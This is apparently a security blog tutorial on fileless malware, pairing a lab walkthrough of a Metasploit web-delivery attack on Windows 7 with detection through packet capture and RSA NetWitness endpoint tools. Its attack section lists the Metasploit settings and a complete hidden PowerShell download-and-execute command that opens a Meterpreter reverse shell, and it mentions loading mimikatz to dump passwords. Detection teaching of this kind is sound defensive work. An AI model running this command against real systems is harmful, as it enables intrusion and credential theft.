Fileless malware is a method used to compromise a system without writing any file to disk. This allows to remain stealthy and avoid detection from some antiviruses, EPP and EDR solutions.
We will look at how to test this type of attack and then at ways to detect it.
Performing the Attack
The following is an example of how to perform such an attack, gaining a Meterpreter shell on the victim’s machine using Metsaploit (on the attacker’s side) and Powershell (on the victim’s side) without writing anything to disk.
I am using Kali Linux as the Attacker and Windows 7 as the victim.
1st we need to run Metasploit:
To deliver the PowerShell script, we will use exploit/multi/script/web_delivery
Metaploit would generate the ps1 file, start a webserver and host it for delivery. We will use PowerShell on the victim’s machine to download the script and meterpreter payload, and load it directly into memory without writing anything to disk.
Now we will look at the parameters that need to be configured:
We need to:
- Set “Target” to 2 for PSH (PowerShell)
- Set “LHOST” to the IP of the attacker (in my case, 192.168.1.3)
- Set the payload we want to use to get the reverse shell (I will use windows/meterpreter/reverse_tcp)
set target 2
set LHOST 192.168.1.3
set payload windows/meterpreter/reverse_tcp
We can now execute the payload:
To gain reverse shell on the victim, we just need to execute the following command (no malware installed, nothing will be written on disk, it will all happen from memory) by replacing the URL at the end with the one provided in the output of Metasploit under “Local IP” (with your IP address and the correct randomly generated filename):
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring(‘http://192.168.1.3:8080/VpBSRDO’);
We can now see that we have an active session in Metasploit.
We could then load mimikatz in memory to dump passwords, without touching the disk.
session -i 1
Visibility and detection of such attacks using full packet capture and EDR solutions such as RSA NetWitness for Packets and RSA NetWitness for Endpoint.
With a full packet capture solution (in this case, RSA NetWitness for Packets), it is possible to reconstruct the delivery of the PowerShell script and of the payloads (Meterpreter and mimikatz). This is assuming that the traffic is not encrypted.
Detection from the Network Traffic
Reconstruction of the initial PowerShell script based on full packet capture from the network traffic:
Reconstruction of the meterpreter payload based on full packet capture from the network traffic:
Detection from the Endpoint
Using some EDR solutions that have visibility into the endpoint’s memory and behavior (not limited to files on disk), it is possible to also have the needed visibility to detect this type of attack even when the network traffic is encrypted. The below is based on RSA NetWitness for Endpoint.
Suspicious Threads detected showing that PowerShell.exe loaded a DLL in memory (meterpreter):
By doing static analysis on the in-memory modules, we can try to identify them. We can see strings related to mimikatz in one of the modules:
And the IP address and Port Number used by the Meterpreter payload hard coded in the second module:
We can also see suspicious behaviors and IOCs that have been triggered for PowerShell:
We can also track the behavior of the different processes on the victim’s machine to see how the attack is performed and what commands the attacker has issues after gaining access. In this case:
- the initial PowerShell command to grab the hosted PowerShell script and load it in memory
- the executed PowerShell script with all parameter that load the Meterpreter payload in memory
- the commands executed by the attacker after he gains access (whoami, hostname, ipconfig, netstat -an)